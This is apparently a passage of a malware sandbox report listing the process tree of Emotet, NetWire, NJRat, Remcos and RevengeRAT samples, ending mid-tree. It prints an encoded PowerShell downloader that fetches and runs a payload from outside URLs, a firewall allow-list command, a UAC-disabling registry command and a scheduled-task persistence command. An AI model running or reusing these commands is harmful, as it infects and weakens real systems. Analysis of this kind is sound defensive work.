  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8568 /prefetch:1
  2⤵
  PID:6128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8516 /prefetch:1
  2⤵
  PID:5688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7172 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9472 /prefetch:1
  2⤵
  PID:3624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3796 /prefetch:8
  2⤵
  PID:5480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2880 /prefetch:1
  2⤵
  PID:2144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9240 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
  2⤵
  PID:3824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8656 /prefetch:1
  2⤵
  PID:844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9208 /prefetch:1
  2⤵
  PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:5644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
  2⤵
  PID:6000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3036 /prefetch:8
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
  2⤵
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9224 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7972 /prefetch:8
  2⤵
  PID:956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8956 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9512 /prefetch:8
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8860 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9152 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9460 /prefetch:8
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8776 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9608 /prefetch:8
  2⤵
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9732 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9772 /prefetch:8
  2⤵
  PID:5476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9740 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9736 /prefetch:8
  2⤵
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9856 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9912 /prefetch:8
  2⤵
  PID:5336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9748 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9896 /prefetch:8
  2⤵
  PID:5328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9948 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6532 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10048 /prefetch:8
  2⤵
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10072 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:6064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10028 /prefetch:1
  2⤵
  PID:3016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9828 /prefetch:1
  2⤵
  PID:5592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:1
  2⤵
  PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10220 /prefetch:1
  2⤵
  PID:1436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9640 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3372

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4464

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4840

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5596

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\[email protected]" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3712
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892

C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
1⤵
PID:3416

C:\Users\Admin\Desktop\New folder\NetWire.exe
"C:\Users\Admin\Desktop\New folder\NetWire.exe"
1⤵
- Executes dropped EXE
PID:4768
- C:\Users\Admin\Desktop\New folder\NetWire.exe
  "C:\Users\Admin\Desktop\New folder\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  PID:4500
- - C:\Windows\SysWOW64\Notepad.exe
    C:\Windows\System32\Notepad.exe
    3⤵
    PID:2312
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    PID:5608

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004E8
1⤵
PID:3600

C:\Users\Admin\Desktop\New folder\NJRat.exe
"C:\Users\Admin\Desktop\New folder\NJRat.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram "C:\Users\Admin\Desktop\New folder\NJRat.exe" "NJRat.exe" ENABLE
  2⤵
  - Modifies Windows Firewall
  PID:5892

C:\Users\Admin\Desktop\New folder\Remcos.exe
"C:\Users\Admin\Desktop\New folder\Remcos.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:3664
- C:\Windows\SysWOW64\cmd.exe
  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:2212
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:3332
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
  2⤵
  PID:3924

C:\Users\Admin\Desktop\New folder\RevengeRAT.exe
"C:\Users\Admin\Desktop\New folder\RevengeRAT.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1772
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  PID:1124
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:4884
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\m_asayys.cmdline"
    3⤵
    PID:5956
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES419B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB09C7647A6324257A2F2FDA9E875A6D3.TMP"
      4⤵
      PID:5024
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pozsd9t9.cmdline"
    3⤵
    PID:5660
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4757.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD7A558F2FAE542E89E82B6D22BCFFE.TMP"
      4⤵
      PID:5288
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nsaxao1c.cmdline"
    3⤵
    PID:3476
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D53.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB0137D8046AE4942908918FE1BF51E2E.TMP"
      4⤵
      PID:72
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ebnq8ddz.cmdline"
    3⤵
    PID:4564
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES56F7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCCDD038F6E6E446CBC165B21CB50FF10.TMP"
      4⤵
      PID:1748
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
    3⤵
    PID:5948
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
      4⤵
      PID:3216
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        5⤵
        
        PID:3724
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xyw8t7qi.cmdline"
        5⤵
        
        PID:1040
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE17.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4791134745E24BA7ABBCB733117F5581.TMP"
        6⤵
        
        PID:5100
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:5320
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kbiqzjod.cmdline"
        5⤵
        
        PID:2184
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
